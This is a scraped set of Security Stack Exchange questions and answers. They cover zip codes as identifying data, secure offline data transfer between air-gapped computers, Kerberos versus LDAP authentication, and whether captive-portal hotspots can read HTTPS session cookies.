A public website of a financial firm (falls under SEC) has a HTML 5 map of the US where each point on the map is the 5 digit zip code of their clients. These points are generated from a CSV file that is pulled from the server into the browser so you can actually download the CSV file yourself. The CSV file contains the City, Zip, and Latitude/Longitude of the zip code itself, not the client's street address. I was wondering, are zip codes alone considered personal identifying information?
Netflix once planned to have a contest (to improve movie recommendations) where they would release movie rental history, movie reviews along their birth dates, gender, and five-digit zip code. That combination is personally identifying information and could do things like out someone's private sexual identity if that could be inferred from their rental history. A famous study found that with the date of birth, gender, and five-digit zip code you can uniquely identify about 87% of Americans . It also found that you could uniquely identify about 100,000 Americans (0.04%) by the combination of year of birth, gender, and zip code. For medical de-identification of protected health information (PHI), the US Dept of Health and Human Services suggests to truncate the last two digits of the five-digit zip code off, except for 17 rare zip codes starters (where less than 20,000 people share these three initial digits according to the US Census) (specifically 036, 059, 063, 102, 203, 556, 692, 790, 821, 823, 830, 831, 878, 879, 884, 890, 893) in which case you should replace the zip code with all zeros. Similarly, you should be mindful of fields like age in exceptional cases are rare (e.g., there's only one American with an age of 116) so HHS recommends grouping these exceptional ages into one category (e.g., 90+). It's also probably better to group other users into age categories (like 50-55) to help anonymize them further.
{ "source": [ "https://security.stackexchange.com/questions/109398", "https://security.stackexchange.com", "https://security.stackexchange.com/users/86493/" ] }
109,477
Since, recently, it has been proven that transferring data through the usb port is fundamentally flawed, I'm wondering if there are 100% secure ways to transfer data without using the Internet. Suppose Alan has a computer system that has been offline for all of it's life. Alan wants to import some data from Bob. Can Alan do this and remain disconnected from the outside world? My thoughts were, either Alan has to have complete control over the data being transferred (i.e. Alan knows 100% what he is importing), or Alan must know exactly (and I mean it) how data is being handled by his computer system. That is because, Alan might already have malware installed on his computer system, and this malware might use pieces of data from the data being transferred that might provide the communication between Alan's computer system and the outside world without actually installing any malware in the process of the transfer. Edit: Instead of "Alan wants to import some data from Bob", I should have written that Alan and Bob want to communicate bidirectionally while neither of them would be connected to the Internet during their communication. When I wrote "security", I meant securing that Alan does not leak any data other than the data he intends to send. So, even if the data gets modified when it gets to Bob, and as long as the bits of data that were modified are not copied from Alan's system, it would qualify as 100% secure, for this type of security. Also, Bob is a regular user of the Internet for life with the possibility of going offline for some period of time (i.e. during the data transfer between the two). When I wrote "Alan has to have complete control over the data being transferred", I meant that Alan has to have a way of checking bit by bit the information that is in transit, and in some way understand it precisely. Just to be more explicit, Bob can have malware on his computer as well.
It really depends upon the specific threats you may be facing, the direction of your data transfers, etc. USB specific dangers You mention the dangers of USB. The main one is indeed related to its firmware opening the possibility of a BadUSB type attack. When you need to transfer data in both directions, you may therefore prefer to use SD-Cards which are not sensitive to such threats (if you use an external USB SD-Card reader, it should be safe but dedicate it to a single computer, don't share it!). I insist here that I'm mentioning SD-Cards as a viable solution against USB firmware attacks only. In such attacks, a USB flash drive firmware may be corrupted in order to simulate rogue devices (fake keyboard, network card, etc.), such attacks are not possible with SD-Cards. I think this is the reason why we see Edward Snowden relying on SD-Cards in Laura Poitras' Citizenfour film when exchanging files between his own computer and the reporter's ones. SD-Cards are also equipped with a read-only switch. While such switches are very convenient to prevent accidental modification of the card's content, they cannot be relied upon to prevent malicious modifications since read-only access is not enforced by the card itself but delegated to the computer's operating system. Enforce a one-way communication You talk about a possible leak of information by some malware on Alan's computer storing data in some hidden channel. If your transfers are mostly in one direction only and this is your main threat, then I suggest you use read-only media like CDs or DVDs . I don't know if there are still CD/DVD readers on the market, it would be the best since it would physically remove all possibility for Alan's PC to store any data on them, but even without that it would be by far harder to store any data discretely on such disk. With some digging, you may also find some other alternatives, for instance in the thread how to protect my USB stick from Viruses you will see a discussion pertaining to USB sticks containing a write blocking switch (which works in a more secure way than the SD-Card's equivalent), the use of write blockers which are equipment normally designed for forensic purposes, etc. Long distance communication Implemented as-is, the solutions provided above suppose that Alan and Bob are in direct contact, which may not always be true. However, data transfers outside of any computer networks remains possible even on long distance, mostly by using usual postal mails, aka snail mail . This method may be wrongly perceived as insecure by some people, while when used correctly it can actually present a very high security level. Such method is used by the industry when it is required to move a very large amount of data securely. Amazon provides his Amazon snowball service for such operation, Wikipedia's page about sneakernet also lists some other real-life usage examples, including funny experiments inspired from an April Fool's day RFC using carrier pigeon to carry the storage medium. In our current scenario, Alan and Bob will need to take a few precautions to ensure everything goes fine: Alice and Bob will need to exchange their public keys. This may sound simple, but in the concrete world Alan and Bob may have no possibility to meet even once, may not know each other and may have no common trusted third party to vouch for each other's identity or provide escrow service. However, the whole security of this system relies on the fact that this operation must be done successfully. Fortunately, asymmetric encryption greatly helps, since the leak of these keys will have no deep impact, but it will be of no help against an impersonation or tampering occurring at this step. The chosen data exchange medium may have some importance since each may present different characteristics: Firmware based storage devices are the most frequent nowadays, ranging from the hard disks with higher data volume to micro SD cards which can be very easily concealed. One may prefer to buy it from some physical store to avoid any initial tampering, but as we will see later the device will in all case be not trustable anymore once the first shipment occurred. Non-firmware based device present obviously no firmware related issue, but depending on the exact needs of Alan and Bob they may present other issues in particular pertaining to anonymity: burned disks and printed paper for instance may contain unique identifiers allowing to link them to their author (such identifier does not allow the author location though, but once his equipment has been seized they can be used to prove that this equipment produced them). Of course the data will need to be properly encrypted and signed before being stored on the medium. I would tend to prefer an encrypted file which can be more easily manipulated than an using directly an encrypted partition on the medium. I strongly suggest for the data to be properly backed up before being sent. While such transfer is secure in the way that a potential opponent will not be able to access or tamper with the data even if he manages to intercept it, the data may still get lost or disappear (it can be the result of either a voluntary or involuntary action: it happens that parcels get lost or seized without any intervention from Big Brother, Murphy is very good at that too!). Methods to obfuscate the actual sender and recipient (from PO boxes to more advanced stuff), when combined with concealment of the storage device, can help to avoid interception. At least on the recipient side, I strongly advise to not connect the received storage device directly to the main computer, but instead: Connect the received media to a specially hardened minimal system (aka a sheep dip , the host itself may have no hard-disk and boot from a LiveCD) where you will be able to quickly inspect media content and the encrypted file (do not decrypt it on this host!), You may possibly want to copy the encrypted file to a more trusted support (here one case where using an encrypted file instead of an encrypted partition can be useful). Moving the encrypted file to another support may be especially useful if using a firmware base storage device since, once it went through the postal service, you cannot guaranty the firmware integrity anymore (while the encrypted data is signed, there is no signature you can check for the rest of the storage device). Then you can connect this most trusted support on your main air gaped computer where you will be able to safely decrypt it, making this step the end of the story :).
{ "source": [ "https://security.stackexchange.com/questions/109477", "https://security.stackexchange.com", "https://security.stackexchange.com/users/29193/" ] }
109,565
Can anyone describe/outline the relative merits of using Kerberos or LDAP for authentication in a large heterogeneous environment? And Can we switch between them transparently?
Where possible use Kerberos authentication above all else. It was built for providing authentication/authorization and is the most secure option . The whole premise is to exchange credentials in an environment that isn't trusted. LDAP can be easily misconfigured to send credentials in clear text over the network. An easy way to prevent this is always use LDAPS (TCP636) as it encapsulates all traffic in SSL. LDAP is often used for adhoc authentication/authorization especially web applications using forms authentication.
{ "source": [ "https://security.stackexchange.com/questions/109565", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95433/" ] }
109,568
I have a security concern. As we know, many public hotspots redirect you to a login screen when you try to surf the first web site. For example, if I connect to such a hotspot and then visit https://www.facebook.com (from a computer where I'm already logged in that site) I get redirected to the hotspot login screen, without any certificate warning in my browser. Obviously, the initial HTTPS request made from my browser contains my session cookie ("Cookie:" HTTP header). While doing the redirection to the login screen (ICMP or DNS based redirection), will the hotspot know my HTTPS request content, and so, my session cookie? I assume that a malicious hotspot can read my first HTTPS request: When the browser tries to connect to facebook.com:443, it will do the certificate handshaking; The hotspot will reply sending a valid IP-based certificate, so, the hotspot will impersonate "facebook.com" and will read my original HTTPS request content; After that, it may reply with a 301/302 redirect to the hotspot HTTPS login screen, without any warning in the browser client. In this way, it will be possible for a hotspot to know the content of the first HTTPS request?
If you visit HTTPS sites and get redirected without any warnings then the problem is that your browser doesn't correctly validate certificates - a good browser would display a warning as the captive portal's certificate does not contain the domain you wanted to visit in its common name field. A possible vulnerability would be if you visit the site over HTTP, but there are solutions to mitigate this such as the Secure Flag on cookies that tell the browser not to send this cookie over HTTP - and HSTS which makes the browser automatically convert your HTTP requests to the site into HTTPS requests, in addition to preventing you from bypassing the certificate error if an HTTPS connection can't be made.
{ "source": [ "https://security.stackexchange.com/questions/109568", "https://security.stackexchange.com", "https://security.stackexchange.com/users/95841/" ] }